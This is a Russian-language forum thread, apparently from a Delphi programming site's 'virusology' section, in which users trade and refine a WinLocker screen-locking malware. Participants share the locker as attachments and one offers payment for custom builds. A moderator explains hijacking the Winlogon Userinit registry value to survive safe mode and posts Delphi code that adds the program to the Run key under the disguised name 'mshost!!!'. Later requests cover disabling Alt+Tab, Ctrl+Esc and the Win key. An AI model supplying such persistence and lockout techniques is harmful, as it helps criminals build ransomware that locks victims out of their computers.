Четверг, 15.04.2021, 01:40 Приветствую вас Гость | Группа "Гости" 
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Модератор форума: Волк-1024, Anton93, xXxSh@dowxXx  
delphicode » Delphi » Вирусология Delphi » WinLocker (Влокиратор винды)
WinLocker
Sector009Дата: Суббота, 11.12.2010, 21:08 | Сообщение # 1
Был не раз
Зарегистрирован: 07.10.2010
Группа: Пользователи
Сообщений: 6
Статус: Offline
Влокиратор винды
Прикрепления: WinLocker.zip(12.8 Kb)
 
Anton93Дата: Воскресенье, 19.12.2010, 11:04 | Сообщение # 2
Продвинутый
Зарегистрирован: 06.01.2010
Группа: Модераторы
Сообщений: 320
Статус: Offline
писал похожую вещь на чистом api размер вируса был всего 19kb tongue

ICQ: 41896
 
GalahemДата: Понедельник, 13.06.2011, 17:00 | Сообщение # 3
Группа: Удаленные



День добрый.
Интересует подобный софт. Есть некоторые пожелания по подобному софту.
Готов хорошо заплатить тому кто сможет воплотить в реальность мои пожелания.
З.Ы. Если все сложится в положительном свете, готов сотрудничать на постоянной основе.
З.Ы.Ы. Ищу не новичков, а профи. За дешевизной не гонюсь. Первый контакт в ПМ.
 
link993Дата: Понедельник, 13.06.2011, 18:40 | Сообщение # 4
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
Sector009, ты взял исходник с delphisources.ru...
 
opiusДата: Понедельник, 13.06.2011, 19:44 | Сообщение # 5
Частый гость
Зарегистрирован: 18.03.2010
Группа: Пользователи
Сообщений: 46
Статус: Offline
link993, это я его туда кинул немного переделав а так он был на этом сайте гдето!


 
Just_CrowДата: Суббота, 13.08.2011, 16:18 | Сообщение # 6
Частый гость
Зарегистрирован: 13.08.2011
Группа: Пользователи
Сообщений: 27
Статус: Offline
а есть локер который блокирует и безопастный режим тоже =) ? если есть то ссылочку пожалуйста)))
заранее благодарен)
 
NeoДата: Суббота, 13.08.2011, 16:31 | Сообщение # 7
Модератор
Зарегистрирован: 04.05.2010
Группа: Модераторы
Сообщений: 317
Статус: Offline
Ты имеешь в виду,чтобы безопасный режим не загружался или в безопасном загружался банер?
 
Just_CrowДата: Суббота, 13.08.2011, 18:25 | Сообщение # 8
Частый гость
Зарегистрирован: 13.08.2011
Группа: Пользователи
Сообщений: 27
Статус: Offline
ну это практически одно и тоже, в безопастном режиме знаю не будет он открываться, поэтому чтобы блокировать безопастный режим =)))
 
NeoДата: Суббота, 13.08.2011, 22:19 | Сообщение # 9
Модератор
Зарегистрирован: 04.05.2010
Группа: Модераторы
Сообщений: 317
Статус: Offline
Слабость большинства винлокеров в том,что для обеспечения автозагрузки приходится прописывать их в реестр,а подходящих месть для этого не так уж и много.Есть одно место в реестре HKLM\Microsoft\Windows NT\CurrentVersion\Winlogon,там параметр Userinit,добавляешь к текущему значению(после запятой) путь твоего винлокера.Тогда и в безопасном запустится.(Точно знаю,на себе испытывал)Проблема в том,что авири это местознают и следят за ним.
 
Just_CrowДата: Суббота, 13.08.2011, 22:40 | Сообщение # 10
Частый гость
Зарегистрирован: 13.08.2011
Группа: Пользователи
Сообщений: 27
Статус: Offline
ладно упросим задачу. пофиг какой главное чтоб блочил систему и все комбинации типа Win+R, ну естестно автозагрузка biggrin
за помощь готов поделиться номерками аси =))))
 
Just_CrowДата: Воскресенье, 14.08.2011, 17:15 | Сообщение # 11
Частый гость
Зарегистрирован: 13.08.2011
Группа: Пользователи
Сообщений: 27
Статус: Offline
ВИнлок предоставленный выше не автозагружается((( а можно сделать чтобы ВинлокВинлок в автозагрузку происывал себя smile если да то подскажите как
 
gravitasДата: Воскресенье, 14.08.2011, 18:19 | Сообщение # 12
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Quote (Just_Crow)
ВИнлок предоставленный выше не автозагружается((( а можно сделать чтобы ВинлокВинлок в автозагрузку происывал себя если да то подскажите как

Реестр, ключ ищем в поисковике.


TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
Just_CrowДата: Воскресенье, 14.08.2011, 19:00 | Сообщение # 13
Частый гость
Зарегистрирован: 13.08.2011
Группа: Пользователи
Сообщений: 27
Статус: Offline
спасибо за подробную инструкцию)

вставляю код но эффекта 0 что не правильно скажите пожалуйста, в гугл плиз не посылать я там был cry
 
gravitasДата: Воскресенье, 14.08.2011, 21:16 | Сообщение # 14
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Quote (Just_Crow)
WriteString('Тест', 'C:\Тест.exe');

А вы уверены, что это путь к вашей программе?


TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
XSPYДата: Воскресенье, 14.08.2011, 21:17 | Сообщение # 15
Продвинутый
Зарегистрирован: 28.01.2010
Группа: Пользователи
Сообщений: 263
Статус: Offline
Just_Crow, тут даже цикл не нужен) wink

Я не крекер,а программист!
Я не преступник-я свободный человек!
Лучше один раз накодить,чем сто раз качать билды!
 
Just_CrowДата: Воскресенье, 14.08.2011, 21:36 | Сообщение # 16
Частый гость
Зарегистрирован: 13.08.2011
Группа: Пользователи
Сообщений: 27
Статус: Offline
angry с путем все норм, тест это я так прост написал
В винлоке тс'а стоит автозагрузка по-моему, хотя я мало разбираюсь cry

только не срабатывает она surprised помогите плиззззз что и куда втыкнуть) та-же просьба, в гугл и прочие поисковики уже ходил
 
gravitasДата: Понедельник, 15.08.2011, 00:05 | Сообщение # 17
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
От имени админа проект запустите.

TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
NeoДата: Понедельник, 15.08.2011, 07:05 | Сообщение # 18
Модератор
Зарегистрирован: 04.05.2010
Группа: Модераторы
Сообщений: 317
Статус: Offline
Попробуй так:
Code
function RegSetString(key:Hkey; subkey,name,value:string):boolean;
var
regkey:hkey;
begin
   result := false;
   RegCreateKey(key,PChar(subkey),regkey);
   if RegSetValueEx(regkey,Pchar(name),0,2,pchar(value),length(value)) = 0 then
         result := true;
   RegCloseKey(regkey);
end;

А вызвай так:
Code
procedure TForm1.Button1Click(Sender: TObject);
begin
    RegSetString($80000002,'SOFTWARE\Microsoft\Windows\CurrentVersion\Run','mshost!!!',paramstr(0));
end;
 
Just_CrowДата: Понедельник, 15.08.2011, 08:28 | Сообщение # 19
Частый гость
Зарегистрирован: 13.08.2011
Группа: Пользователи
Сообщений: 27
Статус: Offline
итак от админа запускалось + на двух компах проверено
Я извеняюсь за назойливость, но куда именно вбивать коды cry
вот скрин всего что есть.
Прикрепления: 7022807.png(22.5 Kb)
 
NeoДата: Понедельник, 15.08.2011, 09:07 | Сообщение # 20
Модератор
Зарегистрирован: 04.05.2010
Группа: Модераторы
Сообщений: 317
Статус: Offline
Короче вот как это будет выглядеть с автозапуском.
Прикрепления: 8109955.rar(183.6 Kb)
 
Just_CrowДата: Понедельник, 15.08.2011, 09:26 | Сообщение # 21
Частый гость
Зарегистрирован: 13.08.2011
Группа: Пользователи
Сообщений: 27
Статус: Offline
Neo, спасибо все работает кул! только в весе заметно прибавил dry но мне трын трава. респект tongue
 
Just_CrowДата: Среда, 24.08.2011, 11:42 | Сообщение # 22
Частый гость
Зарегистрирован: 13.08.2011
Группа: Пользователи
Сообщений: 27
Статус: Offline
А можно его на WIn2003 ??? я пробовал не работает sad
 
Ale22XeyДата: Среда, 03.10.2012, 22:19 | Сообщение # 23
Новичок
Зарегистрирован: 03.10.2012
Группа: Пользователи
Сообщений: 1
Статус: Offline
А подскажите код как сделать, чтобы при запуске он заменял файл userinit просто видел на одном баннере так было и еще как отключить функции CTRL+ESC, ALT+TAB и саму кнопку Win.
 
xXxSh@dowxXxДата: Четверг, 04.10.2012, 18:06 | Сообщение # 24
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
Quote (Just_Crow)
пофиг какой главное чтоб блочил систему и все комбинации типа Win+R


есть где то на форуме тема по загрузке winlocker'a до загрузки винды, или как еще его называют mbr winlock!
 
delphicode » Delphi » Вирусология Delphi » WinLocker (Влокиратор винды)
  • Страница 1 из 1
  • 1
Поиск:

delphicode.ru © 2008 - 2021 Хостинг от uCoz